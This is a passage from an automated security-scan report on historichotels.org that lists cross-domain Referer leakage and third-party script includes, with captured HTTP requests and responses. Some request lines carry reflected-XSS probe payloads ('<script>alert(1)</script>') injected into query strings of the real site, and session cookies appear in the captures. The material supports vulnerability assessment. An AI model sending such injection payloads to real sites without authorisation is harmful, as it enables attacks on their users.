Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:39:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.historichotels.org/SpecialsPackages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /SpecialsPackages

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /SpecialsPackages?7f98a"><script>alert(1)</script>4d036e11c5f=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.historichotels.org
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:52:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:52:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Specials & Packages, Historic Hotels of America</title>
<META ht
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="font-size: 11px;">
                <a style="color: #000000;" href="https://indecorp.ibe.netbooker.com/web/FrontController.nb4?module=Reservation&operation=RetrieveReservationRV&execute=yes&instanceId=172&locale=WV">View</a>
| <a style="color: #000000;" href="https://indecorp.ibe.netbooker.com/web/FrontController.nb4?module=Reservation&operation=RetrieveReservationRV&execute=yes&instanceId=172&locale=WV">Amend</a>
| <a style="color: #000000;" href="https://indecorp.ibe.netbooker.com/web/FrontController.nb4?module=Reservation&operation=RetrieveReservationRV&execute=yes&instanceId=172&locale=WV">Cancel</a>
...[SNIP]...
<p><a href="http://www.nationaltrust.org">About The National Trust for Historic Preservation</a>
...[SNIP]...
<div align="center" style="margin: 5px;">
        Historic Hotels of America, a <A class=footerlink href="http://www.preferredhotelgroup.com">Preferred Hotel Group</a>
...[SNIP]...
<BR>is a program of the <A class=footerlink href="http://www.nationaltrust.org">National
Trust for Historic Preservation</A>
...[SNIP]...

4.2. http://www.historichotels.org/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?layout=printc35c9"><script>alert(1)</script>e261bb56dd5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.historichotels.org
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:50:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:50:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="font-size: 11px;">
                <a style="color: #000000;" href="https://indecorp.ibe.netbooker.com/web/FrontController.nb4?module=Reservation&operation=RetrieveReservationRV&execute=yes&instanceId=172&locale=WV">View</a>
| <a style="color: #000000;" href="https://indecorp.ibe.netbooker.com/web/FrontController.nb4?module=Reservation&operation=RetrieveReservationRV&execute=yes&instanceId=172&locale=WV">Amend</a>
| <a style="color: #000000;" href="https://indecorp.ibe.netbooker.com/web/FrontController.nb4?module=Reservation&operation=RetrieveReservationRV&execute=yes&instanceId=172&locale=WV">Cancel</a>
...[SNIP]...
<p><a href="http://www.nationaltrust.org">About The National Trust for Historic Preservation</a>
...[SNIP]...
<p align="left">If you are interested in becoming a member of the National Trust for Historic Preservation, please <a href="https://secure2.convio.net/nthp/site/Donation2?df_id=7100&amp;7100.donation=form1"><strong>
...[SNIP]...
<div align="center"><a href="http://www.phgoffers.com/hhastay.aspx"><img border="0" src="http://www.historichotels.org/fckeditor/editor/images/amex.jpg" alt="" />
...[SNIP]...
<div style="margin-top: 5px;"><a href="http://www.phgoffers.com/hhastay.aspx">Special Cardmember Offers <br />
...[SNIP]...
</div>
Follow Historic Hotels of America on                         <a target="_blank" href="http://www.facebook.com/pages/Historic-Hotels-of-America/52351613586">Facebook</a> and <a target="_blank" href="http://twitter.com/HistoricHotelAm">Twitter</a>
...[SNIP]...
<div align="center" style="margin: 5px;">
        Historic Hotels of America, a <A class=footerlink href="http://www.preferredhotelgroup.com">Preferred Hotel Group</a>
...[SNIP]...
<BR>is a program of the <A class=footerlink href="http://www.nationaltrust.org">National
Trust for Historic Preservation</A>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 14 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.historichotels.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Accept: */*
Referer: http://www.summithotels.com/summit/special_offers/index.aspx
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utma=15851695.1873633605.1287100145.1287100145.1287100145.1; __utmz=15851695.1287100145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:39:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:39:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.2. http://www.historichotels.org/SpecialsPackages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /SpecialsPackages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SpecialsPackages HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; __utmc=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:39:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:39:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Specials & Packages, Historic Hotels of America</title>
<META ht
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.3. http://www.historichotels.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; __utmc=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 20 Oct 2010 23:39:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:39:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /fckeditor/editor/images2/1x1.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fckeditor/editor/images2/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; __utmc=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 20 Oct 2010 23:39:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:39:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.5. http://www.historichotels.org/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.6. http://www.historichotels.org/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /shop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shop HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Shop HHA, Historic Hotels of America</title>
<META http-equiv=Co
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.7. http://www.historichotels.org/spas_retreats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /spas_retreats

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spas_retreats HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.8. http://www.historichotels.org/step_back_in_time  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /step_back_in_time

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /step_back_in_time HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Step Back in Time at The Grove Park Inn, Historic Hotels of Ameri
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.9. http://www.historichotels.org/taste_of_napa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /taste_of_napa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /taste_of_napa HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>A Taste of Napa Valley History, Historic Hotels of America</title
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.10. http://www.historichotels.org/the_heathman_hotel_offer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /the_heathman_hotel_offer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /the_heathman_hotel_offer HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Art and History Collide at The Heathman Hotel, Historic Hotels of
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.11. http://www.historichotels.org/the_lenox_special_offer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /the_lenox_special_offer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /the_lenox_special_offer HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:52 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>(Time) Travel to Historic Boston at The Lenox, Historic Hotels of
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.12. http://www.historichotels.org/vacations_leisure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /vacations_leisure

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vacations_leisure HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.13. http://www.historichotels.org/woodlands_inn_1906  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /woodlands_inn_1906

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /woodlands_inn_1906 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:42:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:42:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Southern Hospitality at Its Finest, Historic Hotels of America</t
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.14. http://www.historichotels.org/wort_hospitality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /wort_hospitality

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wort_hospitality HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:42:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:42:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Experience Traditional Western Hospitality, Historic Hotels of Am
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6. Email addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

